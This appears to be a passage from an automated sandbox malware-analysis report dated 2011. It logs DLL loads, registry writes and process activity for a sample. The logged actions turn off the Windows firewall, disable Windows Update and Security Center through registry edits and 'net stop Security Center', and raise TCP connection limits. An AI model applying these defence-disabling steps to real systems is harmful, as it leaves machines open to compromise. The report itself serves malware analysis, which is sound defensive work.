C:\WINDOWS\system32\clb.dll	query and write and read and execute	image	6F2B0000	24576	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	290000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3D0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3E0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	360000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
C:\WINDOWS\system32\shell32.dll	read	commit	1070000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\system32\aclui.dll	read	commit	3A0000	118784	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address

Registry Activities:

Key value set
Key Path	Name	Type	Data	Completion	Count	Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess	Start	Dword	2	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	EnableFirewall	Dword	0	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv	Start	Dword	4	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc	Start	Dword	4	success or wait	1	100B918
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\International	W2KLpk	Dword	0	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters	MaxFreeTcbs	Dword	2000	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters	MaxHashTableSize	Dword	2048	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters	TcpTimedWaitDelay	Dword	30	success or wait	1	100B918
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters	MaxUserPort	Dword	63000	success or wait	1	100B918

Process Activities:

Process terminated
PID	Filepath	Completion	Count	Source Address
1456	C:\WINDOWS\regedit.exe	success or wait	1	1009C2A
1456	C:\WINDOWS\regedit.exe	success or wait	0	1009C2A

User Activities:

Window found
Window name	Class name	HWND of window	Completion	Count	Source Address
no string	RegEdit_RegEdit	0	success	1	1009AE8

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1593596408
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1C0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1593670571
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1E0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1593673190
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 230000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1593674037
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 280000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1593680173
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1593709033
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1593802873
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1593820544
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1593884254
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1593900406
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1593918955
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1593950075
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1593980944
Section loaded	Path: \KnownDlls\comdlg32.dll Access: write and read and execute Type: image Baseaddress: 763B0000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1593994457
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1594022249
Section loaded	Path: C:\WINDOWS\system32\authz.dll Access: query and write and read and execute Type: image Baseaddress: 776C0000 Size: 73728 Protection: read write Mapped to pid: own pid	success or wait	1594083810
Section loaded	Path: C:\WINDOWS\system32\aclui.dll Access: query and write and read and execute Type: image Baseaddress: 71550000 Size: 126976 Protection: read write Mapped to pid: own pid	success or wait	1594140531
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1594195817
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1594209429
Section loaded	Path: C:\WINDOWS\system32\ulib.dll Access: query and write and read and execute Type: image Baseaddress: 71FA0000 Size: 282624 Protection: read write Mapped to pid: own pid	success or wait	1594247779
Section loaded	Path: C:\WINDOWS\system32\clb.dll Access: query and write and read and execute Type: image Baseaddress: 6F2B0000 Size: 24576 Protection: read write Mapped to pid: own pid	success or wait	1594283431
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1594343623
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 290000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1594383065
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3D0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1594432382
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3D0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1594434371
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1594439381
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1594505667
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1594544750
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1594572836
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1594596791
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1594609979
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3E0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1594646871
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 360000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1594729557
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 360000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1594736512
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1594738086
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1594779164
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1594781104
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1594784467
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1070000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1594858187
Section loaded	Path: C:\WINDOWS\system32\aclui.dll Access: read Type: commit Baseaddress: 3A0000 Size: 118784 Protection: readonly Mapped to pid: own pid	success or wait	1595001193
Windows found	Window Name: no string Class Name: RegEdit_RegEdit HWND: 0	success	1595685401
File opened	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	1595688362
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 2 Value: 52 45	success or wait	1595688946
File other operation	Disposition: PositionInformation Data : Offset: 0 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg	success or wait	1595691560
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 65536 Value: 52 45 47 45 44 49 54 34 0D 0A 0D 0A 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30	success or wait	1595697839
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess Name: Start Type: Dword Data: 2	success or wait	1595733988
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile Name: EnableFirewall Type: Dword Data: 0	success or wait	1595735773
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv Name: Start Type: Dword Data: 4	success or wait	1595739023
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc Name: Start Type: Dword Data: 4	success or wait	1595739582
Key value set	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\International Name: W2KLpk Type: Dword Data: 0	success or wait	1595742393
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: MaxFreeTcbs Type: Dword Data: 2000	success or wait	1595748858
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: MaxHashTableSize Type: Dword Data: 2048	success or wait	1595752989
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: TcpTimedWaitDelay Type: Dword Data: 30	success or wait	1595753404
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 65536 Value: 52 45 47 45 44 49 54 34 0D 0A 0D 0A 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30	end of file	1595764183
Key value set	Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters Name: MaxUserPort Type: Dword Data: 63000	success or wait	1596223986
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 65536 Value: 52 45 47 45 44 49 54 34 0D 0A 0D 0A 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30	end of file	1596226864
File read	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7684d.reg Offset: none Length: 65536 Value: 52 45 47 45 44 49 54 34 0D 0A 0D 0A 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 53 68 61 72 65 64 41 63 63 65 73 73 5D 0D 0A 22 53 74 61 72 74 22 3D 64 77 6F 72 64 3A 30 30 30 30	end of file	1596289730
Process terminated	PID: 1456 Path: C:\WINDOWS\regedit.exe	success or wait	1596349006

Analysis File: cmd.exe PID: 1960 Parent PID: 808

Sections

General
Start time:	07:41:12
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\cmd.exe
Commandline:	cmd /c net stop Security Center
Imagebase:	0x4ad00000
File size:	389120 bytes
MD5 hash:	6D778E0F95447E6546553EEEA709D03C

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	270000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	290000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	2E0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	330000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	340000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	480000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	490000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	410000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	970000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	970000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	440000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	440000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	970000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\ShimSharedMemory	write	image	980000	57344	own pid	read write	success or wait	1	4AD031C5
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	990000	126976	own pid	execute	success or wait	1	4AD031C5
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	4AD031C5
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	990000	1208320	own pid	readonly	success or wait	1	4AD031C5
C:\WINDOWS\system32\net.exe	write and read and execute	commit	AC0000	45056	own pid	execute	success or wait	2	4AD031C5
C:\WINDOWS\system32\net.exe	query and read	commit	AC0000	45056	own pid	readonly	success or wait	2	4AD031C5
C:\WINDOWS\system32\net.exe	query and read	commit	990000	45056	own pid	readonly	success or wait	1	4AD031C5

Registry Activities:

Key value queried
Key Path	Name	Completion	Count	Source Address
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager	DisableUNCCheck	object name not found	2	4AD04A2A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager	EnableExtensions	success or wait	2	4AD04A4F
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager	DelayedExpansion	object name not found	2	4AD04A88
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager	DefaultColor	success or wait	2	4AD04AAD
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager	CompletionChar	success or wait	1	4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager	PathCompletionChar	success or wait	1	4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager	AutoRun	success or wait	1	4AD04BB8
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager	CompletionChar	success or wait	1	4AD04AE5
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager	PathCompletionChar	object name not found	1	4AD04B37
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager	AutoRun	object name not found	1	4AD04BB8

Process Activities:

Process started
PID	Filepath	Cmdline	Flags	Completion	Count	Source Address
1520	C:\WINDOWS\system32\net.exe	net stop Security Center	suspended	success or wait	1	4AD031C5

Memory Activities:

Memory allocated
PID	Filepath	Base	Length	Protection	Completion	Count	Source Address
1960	C:\WINDOWS\system32\cmd.exe	970000	13FE10	page read and write	success or wait	1	4AD04578

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1593619609
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 270000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1593683889
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 290000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1593684933
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 2E0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1593702403
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 330000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1593709268
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1593772986
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1593818324
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1593822858
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1593898041
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 340000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1593920832
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1593937666
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 480000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1593948867
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1593955367
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1593976819
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1593984702
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1593991886
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1594002685
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1594032188
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1594085596
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1594136834
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1594196084
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1594201092
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1594210204
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1594244223
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1594286957
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 490000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1594346455
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1594426470
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 410000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1594428441
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1594436127
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 970000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1594935963
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 970000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1594978661
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1595007124
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 440000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1595105446
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1595107266
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 440000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1595114122
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1595198715
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 970000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1595233650
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: DisableUNCCheck	object name not found	1595342136
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: EnableExtensions	success or wait	1595342426
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: DelayedExpansion	object name not found	1595342686
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: DefaultColor	success or wait	1595342945
Key value queried	Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\ThemeManager Name: CompletionChar	success or wait	1595438780
